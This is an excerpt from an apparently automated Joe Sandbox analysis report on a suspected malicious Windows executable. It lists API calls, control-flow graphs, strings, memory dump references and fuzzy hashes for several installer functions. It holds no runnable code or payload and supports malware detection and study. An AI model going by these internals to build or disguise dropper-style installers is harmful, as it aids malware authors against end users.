                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                        • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                        • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                        • EmptyClipboard.USER32 ref: 00405753
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                                        • CloseClipboard.USER32 ref: 004057AE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                        • String ID: dL${$6B
                                                                                                        • API String ID: 590372296-1213295897
                                                                                                        • Opcode ID: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                                                        • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                                        • Opcode Fuzzy Hash: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                                                        • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                                                                        Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 698 40698e-406993 699 406a04-406a22 698->699 700 406995-4069c4 698->700 703 406ffa-40700f 699->703 701 4069c6-4069c9 700->701 702 4069cb-4069cf 700->702 704 4069db-4069de 701->704 705 4069d1-4069d5 702->705 706 4069d7 702->706 707 407011-407027 703->707 708 407029-40703f 703->708 709 4069e0-4069e9 704->709 710 4069fc-4069ff 704->710 705->704 706->704 711 407042-407049 707->711 708->711 712 4069eb 709->712 713 4069ee-4069fa 709->713 716 406bd1-406bef 710->716 714 407070-40707c 711->714 715 40704b-40704f 711->715 712->713 719 406a64-406a92 713->719 724 406812-40681b 714->724 720 407055-40706d 715->720 721 4071fe-407208 715->721 717 406bf1-406c05 716->717 718 406c07-406c19 716->718 723 406c1c-406c26 717->723 718->723 726 406a94-406aac 719->726 727 406aae-406ac8 719->727 720->714 725 407214-407227 721->725 729 406c28 723->729 730 406bc9-406bcf 723->730 731 406821 724->731 732 407229 724->732 733 40722c-407230 725->733 728 406acb-406ad5 726->728 727->728 735 406adb 728->735 736 406a4c-406a52 728->736 737 406ba4-406ba8 729->737 738 406d39-406d46 729->738 730->716 734 406b6d-406b77 730->734 739 406828-40682c 731->739 740 406968-406989 731->740 741 4068cd-4068d1 731->741 742 40693d-406941 731->742 732->733 750 4071bc-4071c6 734->750 751 406b7d-406b9f 734->751 760 406a31-406a49 735->760 761 407198-4071a2 735->761 752 406b05-406b0b 736->752 753 406a58-406a5e 736->753 754 4071b0-4071ba 737->754 755 406bae-406bc6 737->755 738->724 746 406d95-406da4 738->746 739->725 747 406832-40683f 739->747 740->703 744 4068d7-4068f0 741->744 745 40717d-407187 741->745 748 406947-40695b 742->748 749 40718c-407196 742->749 759 4068f3-4068f7 744->759 745->725 746->703 747->732 758 406845-40688b 747->758 762 40695e-406966 748->762 749->725 750->725 751->738 756 406b69 752->756 757 406b0d-406b2b 752->757 753->719 753->756 754->725 755->730 756->734 764 406b43-406b55 757->764 765 406b2d-406b41 757->765 766 4068b3-4068b5 758->766 767 40688d-406891 758->767 759->741 763 4068f9-4068ff 759->763 760->736 761->725 762->740 762->742 773 406901-406908 763->773 774 406929-40693b 763->774 768 406b58-406b62 764->768 765->768 771 4068c3-4068cb 766->771 772 4068b7-4068c1 766->772 769 406893-406896 GlobalFree 767->769 770 40689c-4068aa GlobalAlloc 767->770 768->752 777 406b64 768->777 769->770 770->732 778 4068b0 770->778 771->759 772->771 772->772 775 406913-406923 GlobalAlloc 773->775 776 40690a-40690d GlobalFree 773->776 774->762 775->732 775->774 776->775 780 4071a4-4071ae 777->780 781 406aea-406b02 777->781 778->766 780->725 781->752
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                        • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                                                        • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                        • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                                                        Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420), ref: 004065D2
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                        • String ID: 8gB
                                                                                                        • API String ID: 2295610775-1733800166
                                                                                                        • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                        • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                        • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                        • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                                        Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\depersonaliseredes, xrefs: 004021C3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInstance
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\depersonaliseredes
                                                                                                        • API String ID: 542301482-2980550815
                                                                                                        • Opcode ID: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                                                        • Instruction ID: 81793f1010fc2e559759275c5502ec42cf4e228633e8d7c3619733a9a8aee0f9
                                                                                                        • Opcode Fuzzy Hash: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                                                        • Instruction Fuzzy Hash: 34414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                        Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                                                        • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                                                        • Opcode Fuzzy Hash: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                                                        • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                                                        Function 00403D22 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346windowstringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 193 403ed3-403ee8 191->193 194 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->194 192->191 195 403d46-403d4f 192->195 197 403f28-403f2d call 404247 193->197 198 403eea-403eed 193->198 194->193 199 403d51-403d5e SetWindowPos 195->199 200 403d64-403d67 195->200 212 403f32-403f4d 197->212 204 403f20-403f22 198->204 205 403eef-403efa call 401389 198->205 199->200 201 403d81-403d87 200->201 202 403d69-403d7b ShowWindow 200->202 207 403da3-403da6 201->207 208 403d89-403d9e DestroyWindow 201->208 202->201 204->197 211 4041c8 204->211 205->204 227 403efc-403f1b SendMessageW 205->227 216 403da8-403db4 SetWindowLongW 207->216 217 403db9-403dbf 207->217 213 4041a5-4041ab 208->213 215 4041ca-4041d1 211->215 219 403f56-403f5c 212->219 220 403f4f-403f51 call 40140b 212->220 213->211 222 4041ad-4041b3 213->222 216->215 225 403e62-403e70 call 404262 217->225 226 403dc5-403dd6 GetDlgItem 217->226 223 403f62-403f6d 219->223 224 404186-40419f DestroyWindow EndDialog 219->224 220->219 222->211 228 4041b5-4041be ShowWindow 222->228 223->224 229 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 223->229 224->213 225->215 230 403df5-403df8 226->230 231 403dd8-403def SendMessageW IsWindowEnabled 226->231 227->215 228->211 260 403fc2-403fc7 229->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 229->261 234 403dfa-403dfb 230->234 235 403dfd-403e00 230->235 231->211 231->230 238 403e2b-403e30 call 4041d4 234->238 239 403e02-403e08 235->239 240 403e0e-403e13 235->240 238->225 243 403e49-403e5c SendMessageW 239->243 244 403e0a-403e0c 239->244 240->243 245 403e15-403e1b 240->245 243->225 244->238 246 403e32-403e3b call 40140b 245->246 247 403e1d-403e23 call 40140b 245->247 246->225 257 403e3d-403e47 246->257 256 403e29 247->256 256->238 257->256 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->212 280 40409b-40409d 269->280 280->212 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->213 285 4040e0-40410d CreateDialogParamW 282->285 283->211 284 4040b5-4040bb 283->284 284->212 286 4040c1 284->286 285->213 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->213
                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                                        • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                        • DestroyWindow.USER32 ref: 00403D8F
                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                                                        • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                                                        • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                                        • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                        • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                        • String ID: dL$6B
                                                                                                        • API String ID: 3282139019-3137750261
                                                                                                        • Opcode ID: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                                                        • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                                        • Opcode Fuzzy Hash: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                                                        • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                                                                                        Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 303 4039d9-4039ea call 406152 298->303 304 4039ef-4039f5 lstrcatW 298->304 307 4039fa-403a23 call 403c4a call 405c61 299->307 303->304 304->307 313 403ab5-403abd call 405c61 307->313 314 403a29-403a2e 307->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 315 403a34-403a5c call 406152 314->315 315->313 324 403a5e-403a62 315->324 322 403b71-403b79 call 40140b 320->322 323 403af2-403b22 RegisterClassW 320->323 321->320 337 403b83-403b8e call 403c4a 322->337 338 403b7b-403b7e 322->338 326 403c40 323->326 327 403b28-403b6c SystemParametersInfoW CreateWindowExW 323->327 329 403a74-403a80 lstrlenW 324->329 330 403a64-403a71 call 405b86 324->330 335 403c42-403c49 326->335 327->322 331 403a82-403a90 lstrcmpiW 329->331 332 403aa8-403ab0 call 405b59 call 406284 329->332 330->329 331->332 336 403a92-403a9c GetFileAttributesW 331->336 332->313 341 403aa2-403aa3 call 405ba5 336->341 342 403a9e-403aa0 336->342 348 403b94-403bae ShowWindow call 4065ee 337->348 349 403c17-403c18 call 4053bf 337->349 338->335 341->332 342->332 342->341 356 403bb0-403bb5 call 4065ee 348->356 357 403bba-403bcc GetClassInfoW 348->357 352 403c1d-403c1f 349->352 354 403c21-403c27 352->354 355 403c39-403c3b call 40140b 352->355 354->338 358 403c2d-403c34 call 40140b 354->358 355->326 356->357 361 403be4-403c07 DialogBoxParamW call 40140b 357->361 362 403bce-403bde GetClassInfoW RegisterClassW 357->362 358->338 365 403c0c-403c15 call 4038c4 361->365 362->361 365->335
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                          • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                        • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000), ref: 004039F5
                                                                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A75
                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A93
                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes), ref: 00403ADC
                                                                                                          • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                        • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                        • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                        • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                        • API String ID: 1975747703-1343068273
                                                                                                        • Opcode ID: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                                                        • Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
                                                                                                        • Opcode Fuzzy Hash: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                                                        • Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D
                                                                                                        Function 00402EDD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
